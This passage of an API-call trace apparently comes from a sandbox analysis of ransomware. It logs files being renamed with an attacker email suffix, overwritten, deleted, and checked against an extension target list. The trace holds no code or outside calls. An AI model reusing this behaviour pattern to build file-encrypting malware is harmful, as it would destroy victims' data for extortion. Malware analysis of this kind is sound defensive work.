Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.796] GetLastError () returned 0x0 [0060.796] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x48990, lpOverlapped=0x0) returned 1 [0060.803] WriteFile (in: hFile=0x1a0, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x489a0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x489a0, lpOverlapped=0x0) returned 1 [0060.809] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.809] WriteFile (in: hFile=0x1a0, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0060.809] SetEndOfFile (hFile=0x1a0) returned 1 [0060.809] CloseHandle (hObject=0x1a0) returned 1 [0060.809] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.809] SetEndOfFile (hFile=0x22c) returned 1 [0060.812] CloseHandle (hObject=0x22c) returned 1 [0060.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.812] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 1 [0060.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.812] lstrlenW (lpString=".doc") returned 4 [0060.812] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.812] lstrlenW (lpString=".docx") returned 5 [0060.812] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0060.812] lstrlenW (lpString=".pdf") returned 4 [0060.812] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.812] lstrlenW (lpString=".xls") returned 4 [0060.813] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString=".xlsx") returned 5 [0060.813] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0060.813] lstrlenW (lpString=".ppt") returned 4 [0060.813] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString=".zip") returned 4 [0060.813] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString=".rar") returned 4 [0060.813] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString=".bz2") returned 4 [0060.813] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.813] lstrlenW (lpString=".7z") returned 3 [0060.813] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString=".dbf") returned 4 [0060.813] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString=".1cd") returned 4 [0060.813] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString=".jpg") returned 4 [0060.813] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.813] lstrlenW (lpString=".doc") returned 4 [0060.813] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString=".docx") returned 5 [0060.813] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0060.813] lstrlenW (lpString=".pdf") returned 4 [0060.813] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.813] lstrlenW (lpString=".xls") returned 4 [0060.814] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.814] lstrlenW (lpString=".xlsx") returned 5 [0060.814] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0060.814] lstrlenW (lpString=".ppt") returned 4 [0060.814] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.814] lstrlenW (lpString=".zip") returned 4 [0060.814] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.814] lstrlenW (lpString=".rar") returned 4 [0060.814] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.814] lstrlenW (lpString=".bz2") returned 4 [0060.814] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.814] lstrlenW (lpString=".7z") returned 3 [0060.814] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.814] lstrlenW (lpString=".dbf") returned 4 [0060.814] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.814] lstrlenW (lpString=".1cd") returned 4 [0060.814] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0060.814] lstrlenW (lpString=".jpg") returned 4 [0060.814] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.814] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0060.814] lstrlenW (lpString="ACEWDAT.DLL") returned 11 [0060.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0060.815] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=3050912) returned 1 [0060.815] CloseHandle (hObject=0x22c) returned 1 [0060.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll")) returned 0x20 [0060.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0060.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0060.816] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0060.816] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0060.816] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0060.820] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0060.820] ReadFile (in: hFile=0x22c, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0060.874] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0060.874] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0060.874] ReadFile (in: hFile=0x22c, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 Thread: id = 18 os_tid = 0x9c4 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x38302c0 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x38402c8 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6702f8 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x624128 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670310 [0034.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3de0020 [0034.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670328 [0034.624] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670328, Size=0x20) returned 0x626870 [0034.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670328 [0034.624] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670328, Size=0x20) returned 0x626848 [0034.624] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.624] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.624] Wow64DisableWow64FsRedirection (in: OldValue=0x375ff58 | out: OldValue=0x375ff58*=0x0) returned 1 [0034.624] lstrlenW (lpString="kernel32.dll") returned 12 [0034.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626870 | out: hHeap=0x5d0000) returned 1 [0034.624] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626848 | out: hHeap=0x5d0000) returned 1 [0034.624] Sleep (dwMilliseconds=0x64) [0034.941] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0034.941] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0034.941] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.258] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=47452) returned 1 [0035.258] CloseHandle (hObject=0x1bc) returned 1 [0035.259] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0035.259] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.259] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.259] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.259] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.259] lstrlenW (lpString=".doc") returned 4 [0035.259] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.259] lstrlenW (lpString=".docx") returned 5 [0035.259] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.259] lstrlenW (lpString=".pdf") returned 4 [0035.259] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.259] lstrlenW (lpString=".xls") returned 4 [0035.259] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.259] lstrlenW (lpString=".xlsx") returned 5 [0035.259] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.259] lstrlenW (lpString=".ppt") returned 4 [0035.259] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.259] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.259] lstrlenW (lpString=".zip") returned 4 [0035.259] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.259] lstrlenW (lpString=".rar") returned 4 [0035.259] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.259] lstrlenW (lpString=".bz2") returned 4 [0035.259] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.259] lstrlenW (lpString=".7z") returned 3 [0035.259] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.259] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.259] lstrlenW (lpString=".dbf") returned 4 [0035.260] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString=".1cd") returned 4 [0035.260] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString=".jpg") returned 4 [0035.260] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString=".doc") returned 4 [0035.260] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString=".docx") returned 5 [0035.260] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.260] lstrlenW (lpString=".pdf") returned 4 [0035.260] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString=".xls") returned 4 [0035.260] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.260] lstrlenW (lpString=".xlsx") returned 5 [0035.260] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.260] lstrlenW (lpString=".ppt") returned 4 [0035.260] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString=".zip") returned 4 [0035.260] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.260] lstrlenW (lpString=".rar") returned 4 [0035.260] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString=".bz2") returned 4 [0035.260] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.260] lstrlenW (lpString=".7z") returned 3 [0035.260] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.260] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.260] lstrlenW (lpString=".dbf") returned 4 [0035.261] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.261] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.261] lstrlenW (lpString=".1cd") returned 4 [0035.261] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.261] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.261] lstrlenW (lpString=".jpg") returned 4 [0035.261] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.261] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0035.261] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0035.261] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.261] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=2506240) returned 1 [0035.261] CloseHandle (hObject=0x1bc) returned 1 [0035.261] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020 [0035.261] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.261] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0035.262] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0035.262] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.262] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.262] ReadFile (in: hFile=0x1bc, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.270] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.270] ReadFile (in: hFile=0x1bc, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.283] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.283] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.283] ReadFile (in: hFile=0x1bc, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.444] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.444] WriteFile (in: hFile=0x1bc, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0035.462] SetEndOfFile (hFile=0x1bc) returned 1 [0035.462] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0035.466] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.466] WriteFile (in: hFile=0x1bc, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.468] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.468] WriteFile (in: hFile=0x1bc, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.479] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.479] WriteFile (in: hFile=0x1bc, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.482] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0035.482] CloseHandle (hObject=0x1bc) returned 1 [0036.058] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0036.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.058] lstrlenW (lpString=".doc") returned 4 [0036.058] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.058] lstrlenW (lpString=".docx") returned 5 [0036.058] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.058] lstrlenW (lpString=".pdf") returned 4 [0036.058] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.058] lstrlenW (lpString=".xls") returned 4 [0036.058] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.058] lstrlenW (lpString=".xlsx") returned 5 [0036.058] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.058] lstrlenW (lpString=".ppt") returned 4 [0036.058] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.058] lstrlenW (lpString=".zip") returned 4 [0036.058] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.058] lstrlenW (lpString=".rar") returned 4 [0036.058] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.058] lstrlenW (lpString=".bz2") returned 4 [0036.058] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.059] lstrlenW (lpString=".7z") returned 3 [0036.059] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString=".dbf") returned 4 [0036.059] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString=".1cd") returned 4 [0036.059] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString=".jpg") returned 4 [0036.059] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.059] lstrlenW (lpString=".doc") returned 4 [0036.059] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.059] lstrlenW (lpString=".docx") returned 5 [0036.059] lstrcmpiW 